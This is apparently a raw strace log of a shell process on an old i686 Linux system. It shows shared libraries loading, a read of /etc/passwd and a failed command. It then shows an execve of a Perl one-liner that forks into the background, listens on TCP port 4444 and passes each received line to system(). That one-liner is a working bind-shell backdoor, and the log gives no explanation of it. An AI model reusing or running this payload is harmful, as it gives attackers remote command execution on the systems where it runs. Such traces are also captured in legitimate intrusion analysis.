\0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512
12337 20:25:53.178915 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0
12337 20:25:53.178934 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e4b000
12337 20:25:53.178946 mmap2(0xb7e52000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7e52000
12337 20:25:53.178963 close(1)          = 0
12337 20:25:53.178975 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
12337 20:25:53.178988 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1
12337 20:25:53.179003 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512
12337 20:25:53.179089 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0
12337 20:25:53.179106 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e33000
12337 20:25:53.179118 mmap2(0xb7e47000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7e47000
12337 20:25:53.179133 mmap2(0xb7e49000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e49000
12337 20:25:53.179150 close(1)          = 0
12337 20:25:53.179176 munmap(0xb7fd9000, 29913) = 0
12337 20:25:53.179193 open("/etc/ld.so.cache", O_RDONLY) = 1
12337 20:25:53.179205 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
12337 20:25:53.179221 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fd9000
12337 20:25:53.179231 close(1)          = 0
12337 20:25:53.179242 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
12337 20:25:53.179257 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1
12337 20:25:53.179271 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512
12337 20:25:53.179421 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0
12337 20:25:53.179439 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e29000
12337 20:25:53.179451 mmap2(0xb7e31000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7e31000
12337 20:25:53.179467 close(1)          = 0
12337 20:25:53.179480 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
12337 20:25:53.179493 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1
12337 20:25:53.179508 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512
12337 20:25:53.179595 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0
12337 20:25:53.179612 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e1e000
12337 20:25:53.179623 mmap2(0xb7e27000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7e27000
12337 20:25:53.179639 close(1)          = 0
12337 20:25:53.179660 munmap(0xb7fd9000, 29913) = 0
12337 20:25:53.179675 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1
12337 20:25:53.179689 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)
12337 20:25:53.179701 _llseek(1, 0, [0], SEEK_CUR) = 0
12337 20:25:53.179717 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0
12337 20:25:53.179733 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7fe0000
12337 20:25:53.179744 _llseek(1, 1624, [1624], SEEK_SET) = 0
12337 20:25:53.179759 munmap(0xb7fe0000, 1624) = 0
12337 20:25:53.179769 close(1)          = 0
12337 20:25:53.179807 getpgrp()         = 3831
12337 20:25:53.179841 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0
12337 20:25:53.179871 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0
12337 20:25:53.179886 brk(0x8101000)    = 0x8101000
12337 20:25:53.179918 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
12337 20:25:53.179932 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
12337 20:25:53.179947 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
12337 20:25:53.179983 brk(0x8102000)    = 0x8102000
12337 20:25:53.180009 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
12337 20:25:53.180027 stat64("/sbin/AB", 0xbff4d5a8) = -1 ENOENT (No such file or directory)
12337 20:25:53.180040 stat64("/bin/AB", 0xbff4d5a8) = -1 ENOENT (No such file or directory)
12337 20:25:53.180051 stat64("/usr/sbin/AB", 0xbff4d5a8) = -1 ENOENT (No such file or directory)
12337 20:25:53.180063 stat64("/usr/bin/AB", 0xbff4d5a8) = -1 ENOENT (No such file or directory)
12337 20:25:53.180076 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
12337 20:25:53.180090 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e546f8) = 12338
12338 20:25:53.180135 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
12338 20:25:53.180152 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
12338 20:25:53.180165 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
12338 20:25:53.180176 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
12338 20:25:53.180191 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
12338 20:25:53.180207 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
12338 20:25:53.180220 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0
12338 20:25:53.180274 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)
12338 20:25:53.180298 --- SIGPIPE (Broken pipe) @ 0 (0) ---
12338 20:25:53.180402 exit_group(127)   = ?
12337 20:25:53.286183 rt_sigprocmask(SIG_SETMASK, [],  <unfinished ...>
4519  20:25:53.286212 waitpid(12337,  <unfinished ...>
12337 20:25:53.286225 <... rt_sigprocmask resumed> NULL, 8) = 0
12337 20:25:53.375404 --- SIGCHLD (Child exited) @ 0 (0) ---
12337 20:25:53.375404 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 12338
12337 20:25:53.375405 waitpid(-1, 0xbff4d228, WNOHANG) = -1 ECHILD (No child processes)
12337 20:25:53.375405 sigreturn()       = ? (mask now [])
12337 20:25:53.375405 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
12337 20:25:53.375405 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
12337 20:25:53.375406 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
12337 20:25:53.375406 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0
12337 20:25:53.375415 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
12337 20:25:53.375427 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0
12337 20:25:53.375470 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
12337 20:25:53.375490 stat64("/sbin/perl", 0xbff4d5d8) = -1 ENOENT (No such file or directory)
12337 20:25:53.375503 stat64("/bin/perl", 0xbff4d5d8) = -1 ENOENT (No such file or directory)
12337 20:25:53.375514 stat64("/usr/sbin/perl", 0xbff4d5d8) = -1 ENOENT (No such file or directory)
12337 20:25:53.375526 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0
12337 20:25:53.375544 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0
12337 20:25:53.375570 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
12337 20:25:53.375611 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e546f8) = 12339
12339 20:25:53.545405 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
12339 20:25:53.545406 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
12339 20:25:53.545406 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
12339 20:25:53.545406 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
12339 20:25:53.545406 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
12339 20:25:53.545407 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
12339 20:25:53.545407 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0
12339 20:25:53.545443 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0
12339 20:25:53.545573 brk(0)            = 0x8153000
12339 20:25:53.545595 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
12339 20:25:53.545613 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f70000
12339 20:25:53.545666 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
12339 20:25:53.545686 open("/etc/ld.so.cache", O_RDONLY) = 1
12339 20:25:53.545715 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
12339 20:25:53.545734 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f68000
12339 20:25:53.545745 close(1)          = 0
12339 20:25:53.545756 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
12339 20:25:53.545771 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1
12339 20:25:53.545786 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512
12339 20:25:53.545875 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0
12339 20:25:53.545893 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f64000
12339 20:25:53.545905 mmap2(0xb7f66000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f66000
12339 20:25:53.545921 close(1)          = 0
12339 20:25:53.545932 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
12339 20:25:53.545946 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1
12339 20:25:53.545960 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512
12339 20:25:53.546050 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0
12339 20:25:53.546067 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f3f000
12339 20:25:53.546078 mmap2(0xb7f62000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f62000
